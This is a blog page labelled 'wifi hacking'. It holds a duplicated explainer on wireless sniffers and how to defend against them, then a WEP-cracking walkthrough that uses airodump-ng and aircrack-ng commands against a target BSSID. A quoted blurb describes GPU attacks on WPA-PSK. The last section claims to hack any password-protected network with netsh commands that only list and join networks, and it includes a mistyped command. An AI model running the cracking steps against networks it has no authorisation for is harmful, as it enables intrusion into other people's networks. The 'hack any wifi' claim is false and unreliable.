Showing posts with label wifi hacking. Show all posts
Showing posts with label wifi hacking. Show all posts

Wednesday, December 23, 2015

Wireless Sniffer

What is a Wireless Sniffer?

A wireless sniffer is a type of packet analyzer. A packet analyzer (also known as a packet sniffer) is a piece of software or hardware designed to intercept data as it is transmitted over a network and decode the data into a format that is readable for humans. Wireless sniffers are packet analyzers specifically created for capturing data on wireless networks. Wireless sniffers are also commonly referred to as wireless packet sniffers or wireless network sniffers.
Wireless sniffer tools have many uses in commercial IT environments. Their ability to monitor, intercept, and decode data as it is in transit makes them useful for:
  • Diagnosing and investigating network problems
  • Monitoring network usage, activity, and security
  • Discovering network misuse, vulnerabilitiesmalware, and attack attempts
  • Filtering network traffic
  • Identifying configuration issues and network bottlenecks

Wireless Packet Sniffer Attacks

While wireless packet sniffers are valuable tools for maintaining wireless networks, their capabilities make them popular tools for malicious actors as well. Hackers can use wireless sniffer software to steal data, spy on network activity, and gather information to use in attacking the network. Logins (usernames and passwords) are very common targets for attackers using wireless sniffer tools. Wireless network sniffing attacks usually target unsecure networks, such as free WiFi in public places (coffee shops, hotels, airports, etc).
Wireless sniffer tools are also commonly used in “spoofing” attacks. Spoofing is a type of attack where a malicious party uses information obtained by a wireless sniffer to impersonate another machine on the network. Spoofing attacks often target business’ networks and can be used to steal sensitive information or run man-in-the-middle attacks against network hosts.
There are two modes of wireless sniffing: monitor mode and promiscuous mode. In monitor mode, a wireless sniffer is able to collect and read incoming data without sending any data of its own. A wireless sniffing attack in monitor mode can be very difficult to detect because of this. In promiscuous mode, a sniffer is able to read all data flowing into and out of a wireless access point. Since a wireless sniffer in promiscuous mode also sniffs outgoing data, the sniffer itself actually transmits data across the network. This makes wireless sniffing attacks in promiscuous mode easier to detect. It is more common for attackers to use promiscuous mode in sniffing attacks because promiscuous mode allows attackers to intercept the full range of data flowing through an access point.

Preventing Wireless Sniffer Attacks

There are several measures that organizations should take to mitigate wireless packet sniffer attacks. First off, organizations (and individual users) should refrain from using insecure protocols. Commonly used insecure protocols include basic HTTP authentication, File Transfer Protocol (FTP), and Telnet. Secure protocols such as HTTPS, Secure File Transfer Protocol (SFTP), and Secure Shell (SSH) should be used in place of their insecure alternatives when possible. Secure protocols ensure that any information transmitted will automatically be encrypted. If an insecure protocol must be used, organizations themselves need to encrypt any data that will be sent using that protocol. Virtual Private Networks (VPNs) can be used to encrypt internet traffic and are a popular tool for organizations today.
In addition to encrypting information and using secure protocols, companies can prevent attacks by using wireless sniffer software to sniff their own networks. This allows security teams to view their networks from an attacker’s perspective and discover sniffing vulnerabilities and attacks in progress. While this method will not be effective in discovering wireless network sniffers in monitor mode, it is possible to detect sniffers in promiscuous mode (the preferred mode for attackers) by sniffing your own network.

Tools for Detecting Packet Sniffers

Wireless sniffer software programs frequently include features such as intrusion and hidden network detection for helping organizations discover malicious sniffers on their networks. In addition to using features that are built into wireless sniffer tools, there are many aftermarket tools available that are designed specifically for detecting sniffing attacks. These tools typically perform functions such as monitoring network traffic or scanning network cards in promiscuous mode to detect wireless network sniffers. There are dozens of options (both paid and open source) for sniffer detection tools, so organizational security teams will need to do some research before selecting the right tool for their needs.
Written by: desmond sarkodie

Wireless Sniffer

What is a Wireless Sniffer?

A wireless sniffer is a type of packet analyzer. A packet analyzer (also known as a packet sniffer) is a piece of software or hardware designed to intercept data as it is transmitted over a network and decode the data into a format that is readable for humans. Wireless sniffers are packet analyzers specifically created for capturing data on wireless networks. Wireless sniffers are also commonly referred to as wireless packet sniffers or wireless network sniffers.
Wireless sniffer tools have many uses in commercial IT environments. Their ability to monitor, intercept, and decode data as it is in transit makes them useful for:
  • Diagnosing and investigating network problems
  • Monitoring network usage, activity, and security
  • Discovering network misuse, vulnerabilitiesmalware, and attack attempts
  • Filtering network traffic
  • Identifying configuration issues and network bottlenecks

Wireless Packet Sniffer Attacks

While wireless packet sniffers are valuable tools for maintaining wireless networks, their capabilities make them popular tools for malicious actors as well. Hackers can use wireless sniffer software to steal data, spy on network activity, and gather information to use in attacking the network. Logins (usernames and passwords) are very common targets for attackers using wireless sniffer tools. Wireless network sniffing attacks usually target unsecure networks, such as free WiFi in public places (coffee shops, hotels, airports, etc).
Wireless sniffer tools are also commonly used in “spoofing” attacks. Spoofing is a type of attack where a malicious party uses information obtained by a wireless sniffer to impersonate another machine on the network. Spoofing attacks often target business’ networks and can be used to steal sensitive information or run man-in-the-middle attacks against network hosts.
There are two modes of wireless sniffing: monitor mode and promiscuous mode. In monitor mode, a wireless sniffer is able to collect and read incoming data without sending any data of its own. A wireless sniffing attack in monitor mode can be very difficult to detect because of this. In promiscuous mode, a sniffer is able to read all data flowing into and out of a wireless access point. Since a wireless sniffer in promiscuous mode also sniffs outgoing data, the sniffer itself actually transmits data across the network. This makes wireless sniffing attacks in promiscuous mode easier to detect. It is more common for attackers to use promiscuous mode in sniffing attacks because promiscuous mode allows attackers to intercept the full range of data flowing through an access point.

Preventing Wireless Sniffer Attacks

There are several measures that organizations should take to mitigate wireless packet sniffer attacks. First off, organizations (and individual users) should refrain from using insecure protocols. Commonly used insecure protocols include basic HTTP authentication, File Transfer Protocol (FTP), and Telnet. Secure protocols such as HTTPS, Secure File Transfer Protocol (SFTP), and Secure Shell (SSH) should be used in place of their insecure alternatives when possible. Secure protocols ensure that any information transmitted will automatically be encrypted. If an insecure protocol must be used, organizations themselves need to encrypt any data that will be sent using that protocol. Virtual Private Networks (VPNs) can be used to encrypt internet traffic and are a popular tool for organizations today.
In addition to encrypting information and using secure protocols, companies can prevent attacks by using wireless sniffer software to sniff their own networks. This allows security teams to view their networks from an attacker’s perspective and discover sniffing vulnerabilities and attacks in progress. While this method will not be effective in discovering wireless network sniffers in monitor mode, it is possible to detect sniffers in promiscuous mode (the preferred mode for attackers) by sniffing your own network.

Tools for Detecting Packet Sniffers

Wireless sniffer software programs frequently include features such as intrusion and hidden network detection for helping organizations discover malicious sniffers on their networks. In addition to using features that are built into wireless sniffer tools, there are many aftermarket tools available that are designed specifically for detecting sniffing attacks. These tools typically perform functions such as monitoring network traffic or scanning network cards in promiscuous mode to detect wireless network sniffers. There are dozens of options (both paid and open source) for sniffer detection tools, so organizational security teams will need to do some research before selecting the right tool for their needs.
Written by: desmond sarkodie

Saturday, December 19, 2015

HACKING A WEP KEY WITH AIRODUMP ON UBUNTU

WEP key can easily be cracked with a simple combination of tools on Linux machine. The WEP cracking is made easier by the flaws in the design of the WEP encryption that makes it so vulnerable.



These tools are already inbuilt in the Backtrack linux about which I posted recently. But you can install these hacking tools separately as well on any linux distro.


These steps are made for an Ubuntu machine and uses Debian version which is the format for Ubuntu. Specific version for each each hack tool are available for almost all leading linux versions.

The hack starts-


Install aircrack-ng – on Debian Etch by:

sudo apt-get install aircrack-ng

Then start aircrack-ng to look for wireless networks:


sudo airodump-ng eth1

Then notice the channel number of the wireless network you want to crack.

Quit aircrack-ng and start it again with med specific channel number to collect packages faster:

sudo airodump-ng -c 4 -w dump eth1

Then wait and let it collect about 500K IVS and the try the do the actual crack:

sudo aircrack-ng -b 0a:0b:0c:0d:0e:0f dump-01.cap

The MAC after the -b option is the BSSID of the target and dump-01.cap the file containing the captured packets.


A new project called Pyrit is currently under it’s way. “Pyrit takes a step ahead in attacking WPA-PSK and WPA2-PSK, the protocol that today de-facto protects public WIFI-airspace. The project’s goal is to estimate the real-world security provided by these protocols. Pyrit does not provide binary files or wordlists and does not encourage anyone to participate or engage in any harmful activity. This is a research project, not a cracking tool.

Pyrit’s implementation allows to create massive databases, pre-computing part of the WPA/WPA2-PSK authentication phase in a space-time-tradeoff. The performance gain for real-world-attacks is in the range of three orders of magnitude which urges for re-consideration of the protocol’s security. Exploiting the computational power of GPUs, this is currently by far the most powerful attack against one of the world’s most used security-protocols.”

HOW TO HACK ANY WIRELESS NETWORK THAT IS PROTECTED BY PASSWORD

HACKING ANY WIFI PASSWORD

1.open ur command prompt by searching from the search bar and run it as administrator
2.type in netsh wlan show networks mode=bssid(it will search all avaliable networks
3.type in netsh wlan connect name=[name of network]
4.to disconnect type netshn disconnect name and hit enter